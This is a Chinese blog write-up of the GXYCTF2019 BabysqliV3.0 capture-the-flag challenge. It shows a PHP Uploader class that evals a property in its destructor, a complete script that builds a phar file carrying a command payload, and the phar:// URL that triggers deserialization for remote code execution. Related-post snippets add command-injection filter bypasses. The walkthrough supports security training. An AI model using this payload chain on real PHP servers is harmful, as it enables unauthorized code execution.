[GXYCTF2019]BabysqliV3.0-phar反序列化正解

最新推荐文章于 2022-12-14 23:25:17 发布
最新推荐文章于 2022-12-14 23:25:17 发布
阅读量503 收藏
点赞数
分类专栏: PHP代码审计 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/soldi_er/article/details/117702168
版权

文章目录

  CSDN已经记录登录过程,弱口令登录,不再赘述。

phar反序列化漏洞利用条件

  可以上传文件。可以执行命令的魔法函数。可以解析phar的函数,并且参数可控。

  (1)upload.php可以上传文件。

  (2)upload.php,具有执行命令的魔法函数。

class Uploader{
	public $Filename;
	public $cmd;
	public $token;

function __destruct(){
		if($this->token != $_SESSION['user']){
			$this->cmd = "die('check token falied!');";
		}
		eval($this->cmd);
	}
}

  (3)home.php,具有解析phar的require()函数,但是参数file不可控。upload.php文件,$this->Filename = $_GET['name'];file_get_contents($uploader);。Filename参数完全可控,如果传入phar://文件,就会通过file_get_contents()进行反序列化操作,执行cmd。
  确定可利用参数是upload.php文件的name。

构造payload文件

  根据class和__destruct()构造phar文件:generate-phar.php

<?php
    class Uploader {
	public $Filename;
	public $cmd;
	public $token;

    }
    $o = new Uploader();
    
    $o -> Filename = "test";
    $o -> token = "GXYc893af63052665fd0e5b3bb39cbe1c00";
    $o -> cmd='highlight_file("/var/www/html/flag.php");';


    $phar = new Phar("phar.phar"); //后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub("GIF89A"."<?php __HALT_COMPILER(); ?>"); //设置stub
   
    $phar->setMetadata($o); //将自定义的meta-data存入manifest
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();

?>

漏洞利用

  (1)准备文件:上传phar文件到服务器。(需要构造session)
返回路径:/var/www/html/uploads/d41d8cd98f00b204e9800998ecf8427e/.txt,可以访问以确定文件存在。

  (2)通过可控参数name调用phar://phar.phar文件,实现反序列化RCE。在upload.php中,调用file_get_contents()有前提条件if(isset($_FILES['file']))。因此在调用参数时,需要上传一个文件通过if语句。

  Payload:

http://9bd5537f-763f-49c1-83cb-ac03aeea4a81.node3.buuoj.cn/home.php?file=upload&name=phar:///var/www/html/uploads/2560507db2e4116d7e85053854639258/GXYc7669fdd11003a0c83cd68cc62f0dd14.txt

参考

  攻击链:

	file_get_contents()使$uploader对象通过__toString()返回$this->Filename,
由于phar://伪协议可以不依赖unserialize()直接进行反序列化操作,加之$this->Filename可控,
因此此处$this->Filename配合phar反序列化后,__destruct()方法内eval($this->cmd);最终导致了远程代码执行

  《BUU CTF web(四)》-灰信网,
https://www.freesion.com/article/2410654149/

收获

  理解了实战中的应用场景和步骤。梳理清楚攻击链的步骤,才能够有效利用!
(1)根据类、魔法函数构造phar文件,上传到服务器端,并且要知道相对路径/绝对路径。
(2)找到可控的参数,向参数传值phar://phar文件,实现反序列化漏洞RCE。

  通过phar://调用.txt文件,也可以实现反序列化漏洞。

区块链市场观察家
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[GXYCTF2019]BabysqliV3.0 [phar]
qq_40327508的博客
11-25 1460
打开题目是登录界面,使用burp爆破出密码是password 登录 上传文件,以及url里有拼接file参数,可能有文件包含漏洞 使用php伪协议获取upload源码 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <form action="" method="post" enctype="multipart/form-data"> 上传文件 <input type="fil
利用PHAR协议进行PHP反序列化攻击1
08-03
【PHP反序列化攻击利用PHAR协议详解】 PHP反序列化攻击是一种常见的安全漏洞利用方式,其中PHAR(Php ARchive)协议是这类攻击的一个关键路径。PHAR是PHP中用于打包和分发代码的机制,类似于Java的JAR文件。在...
[GXYCTF2019]BabysqliV3.0
LYJ20010728的博客
05-19 924
[GXYCTF2019]BabysqliV3.0考点思路Payload预期解法非预期解法 考点 弱口令、PHP反序列化 思路 ①:题目页面提示我们应该是需要sqli注入,但是用它输入框提示的admin/password一试就进去了… ②:http://5f8d9cd4-4695-4428-acc2-b02b0e49d8d9.node3.buuoj.cn/home.php?file=upload熟悉的形式,用php伪协议读取一下文件试试; ③:预期解法:审计 upload.php 代码,$this-&g
GXYCTF2019&GWCTF2019——Writeup
Lethe's Blog
03-03 3268
GXYCTF Ping Ping Ping 进入题目后,提示了 /?ip=,于是加上参数 ?ip=1试试看,发现是执行了ping命令: 然后尝试: ?ip=;ls 发现成功执行了命令,但是当读取 flag.php 时,发现过了空格,尝试下面两种绕过方式 ${IFS} $IFS$9 使用第二个$IFS$9代替空格成功绕过,执行 ?ip=;cat$IFS$9flag.php,发现 flag...
[GXYCTF2019]BabysqliV3.0-phar反序列化
soldi_er的博客
05-19 1008
文章目录前期漏洞探测探测SQL注入探测文件上传探测文件包含漏洞反序列化利用-审计源码宽字节概念函数addslashes() 前期漏洞探测 探测SQL注入   登陆框。   面对登陆框时,可以使用admin测试盲注。或者使用pw测。   先fuzz一波,返回的都是"no this user",没有防火墙提醒。   存在admin用户。在name中测7种闭合方式,都返回"no this user"。 admin'%23、')、'")、'))。"、")、"))。   这才贴合实战,要是实战基本就放弃了。一看就知
BUUCTF刷题记录[GXYCTF2019]BabysqliV3.01——涉及phar反序列化pop链
u013119911的博客
06-30 1363
题目是Babysqli,具有一定误导性,会让做题者认为需要sql注入,实际上打开连接输入弱口令:即可进入 至此应该可以看出来是一个文件上传的题目,点击右键查看源代码,未发现有效信息, 在地址栏发现?file=upload,如果需要读取源码,从此处猜测应该是需要构造一个伪协议。从题目上来说,需要查看源码进行代码审计。 这里需要注意,查看upload.php源代码,后面的resource需要等于upload,不要加.php,程序会自动添加.php,......
mix-phar-skeleton:Phar命令行程序开发框架
04-24
Mix Phar Skeleton 命令行单执行文件 Phar 开发程序骨架,Mix 封装的命令行基础设施在骨架中都可使用。 我们提供了打包工具 ,可以将本项目打包为 Phar 文件(就像 golang 编译成执行文件一样)。 PHP 原本就是一个...
Laravel8反序列化POP链分析挖掘 .pdf
09-05
在Laravel 8中,作者提到了CVE-2021-3129,这是一个在Debug模式下可能导致任意代码执行的漏洞,它涉及到Phar反序列化。然而,随着框架版本的升级,Laravel对某些类添加了`__wake`方法以限制反序列化,这使得传统的...
KiteCMS的漏洞挖掘之旅(任意文件写入、任意文件读取和反序列化)1
08-03
在本文中,我们将深入探讨KiteCMS的安全漏洞,特别是关于任意文件写入、任意文件读取和反序列化的风险。KiteCMS是一个基于ThinkPHP5.1框架构建的内容管理系统(CMS)。由于其代码中存在的一些设计缺陷,攻击者可能...
C#做的超市管理系统。
11-17
用c#+sqlsever2005做的超市管理系统,暑假的课程设计。
2017-2019蓝桥杯省赛题解.rar
03-23
2017-2019蓝桥杯省赛题解
phing-phar-builder:将Phing捆绑到具有依赖项PHP phar文件中,以供独立使用
05-11
在提供的文件名称列表"phing-phar-builder-master"中,我们可以推测这是一个项目源代码的主分支。通常,"master"分支代表了项目的主线开发,包含了最新的稳定代码。如果你需要使用或进一步了解PhingPharBuilder,你...
[GXYCTF 2019]BabySqli
Aiwin的博客
08-10 1413
[GXYCTF 2019]BabySqli
BUUCTF [GXYCTF2019]BabySQli实战
永远是少年
12-14 653
今天继续给大家介绍CTF刷题,本文主要内容是BUUCTF [GXYCTF2019]BabySQli实战。 一、题目基本情况 二、解题思路 三、题目评析
GXYCTF web部分简要分析
a3320315的博客
01-25 707
0x01 ping ping ping 很明显的命令注入,我们用管道符号|即可执行我们想要的命令 空格被过滤了,绕过空格的方法有很多,比如 {cat,flag.txt} cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt kg=$'\x20flag.txt'&&cat$kg (\x20转...
[GXYCTF2019]BabySQli
u011250160的博客
12-22 2122
简单的fuzz一下 红色框里的被过滤 然后简单手工测一下发现大小写都可以绕过去了 那就首先试试报错注入吧(因为能看到报错信息) 发现不行 那也不想麻烦去绕这个了 union和select都没过滤 那就可以尝试联合查询 确定有三列 发现这个题小括号好像被ban了 而且这个题好像没有可以回显的位置 没有小括号盲注个der 进入正题 F12发现可疑注释 base32+base64解码得到 select * from user where username = '$name' buu的题目好像少了题目描
BUUCTF--[GXYCTF2019]BabysqliV3.0
qq_46263951的博客
07-23 436
开始是一个登录页面,根据提示尝试万能密码,没啥用...这里尝试了几个弱口令就可以了 admin/password 使用伪协议读取文件内容?file=php://filter/read=convert.base64-encode/resource=upload <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <form action="" method="post" enctype..
[GXYCTF2019]BabysqliV3.0 phar反序列化
qq_54929891的博客
05-15 225
随便输入两个1 看来是要admin登录了,密码我起初以为通过万能密码可以绕过,结果没反应,最后试了一下top100爆破,出来了密码就是password 进入后看到url有一个file参数对应的是upload,页面提示我们现在是引用的upload.php文件,因此我们可以利用伪协议来读取源码了 <?php session_start(); echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=u...
phar反序列化poc
最新发布
05-21
攻击者可以通过构造特定的Phar文件,触发解析器反序列化恶意代码,从而实现远程代码执行。 一个简单的Phar反序列化POC如下: ``` class Example { public $command; } $phar = new Phar('phar.phar'); $phar->...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值